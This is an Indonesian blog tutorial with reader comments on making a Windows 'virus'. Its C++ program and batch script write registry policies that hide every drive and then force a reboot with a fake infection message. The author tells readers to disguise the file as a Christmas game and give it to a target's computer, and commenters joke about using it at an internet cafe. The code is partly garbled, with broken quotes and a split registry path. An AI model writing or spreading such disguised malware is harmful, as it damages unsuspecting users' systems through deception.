Pasang iklan Anda di sini.
http://goo.gl/ad3AU2
> > > Membuat Virus yang Menyembunyikan Semua Drive Harddisk

8 Membuat Virus yang Menyembunyikan Semua Drive Harddisk

Jumat, Februari 10, 2012
Membuat Virus yang Menyembunyikan Semua Drive Harddisk - Hallo penggemar virus seluruh nusantara, Happy weekend ya.
Kali ini saya akan berbagi ilmu tentang virus komputer, bukan sembarang virus, virus komputer ini bisa menyembunyikan/menghide semua drive yang terdeteksi di harddisk. Ini hanya berlaku untuk windows aja ya... kalo OS yang lain ga berpengaruh.



Versi Pertama
Yang pertama dibutuhkan adalah,
1. Compiler C++ untuk membuat aplikasi yang bisa di executable.
2. Siapkan kopi dan kacangnya hahaha XD

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( “C:\\WINDOWS\\system32\\SembunyikanHarddisk.bat” );
write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n”; write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n”; write<<”shutdown -r -c \”Sorry Your System Is Infected by BinusHacker Virus!\” -f”<<”\n”; write.close(); //close file ShellExecute(NULL,”open”,”C:\\WINDOWS\\system32\\SembunyikanHarddisk.bat “,NULL,NULL,SW_SHOWNORMAL); return 0; }

Simpanlah file tersebut dengan ".cpp" extension. misalkan: "virusharddisk.cpp" kemudian compile virusharddisk.cpp menjadi file yang bisa di execute, misal: "virusharddisk.exe" setelah itu manipulasi virusharddisk.exe tersebut menjadi "supergame-natal.exe"

Versi Kedua
Yang perlu sobat persiapkan adalah notepad.

Kemudian buatlah file command executable dengan format.bat (Windows Command Executable)
Berikut kodenya:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \”Sorry Your System Is Infected By BinusHacker Virus!\” -f

Simpanlah file tersebut dengan nama "virusharddisk.bat". Kemudian ubahlah nama filenya dengan nama "game-natal.bat"
kemudian berikan ke target sobat (komputer teman). Kalo target sobat menjalankan aplikasi tersebut... ya selamat tinggal deh ! wkwk

Booom... target sudah terinfeksi virus buatan sobat tadi. Jangan Sekali-kali Menjalankan Dikomputer Kamu Sendiri, Kalo Ngga Senjata Makan Tuan Jadinya !



Artikel Terkait :

8 komentar:

Pendelz mengatakan...

nambah pengetahuan sob

Cirebon-Cyber4rt mengatakan...

@Cyber-exploit hahaha... siip gan :)

@Pandelz yang bener gan :D wkwk

Edyn Laskar mengatakan...

Boleh juga nih dicoba,,, coba praktekin di warnet tetangga ahh,,, iseng dikit kan gak apa2,,, toh udh dapat penangkalnya... dr maha guru wiro sableng,,,, hihihih...

kabuuurrrrrr....

Cirebon-Cyber4rt mengatakan...

Edyn Laskar: hahaa, jangan suka jailin warnet orang, kasian gan :D

sudar saver mengatakan...

trus cara menghentikannya gimana gan..???

Anonim mengatakan...

kalo make deep freeze bisa infeksi gak gan??

Anonim mengatakan...

cara ngembaliinya gmna .?

Rama Dony mengatakan...

Hemm..
berarti kita harus lebih WASPADA nih dengan Executable2 yang menarik,, bisa2 Virus kyk ini yg kita Buka,, ??
ehehe,,

trs apa ngak bisa di kembaliin atau ditampilin lg apa gan hardisk yang udh terserang virus ini ???

Poskan Komentar

Contact

Nama

Email *

Pesan *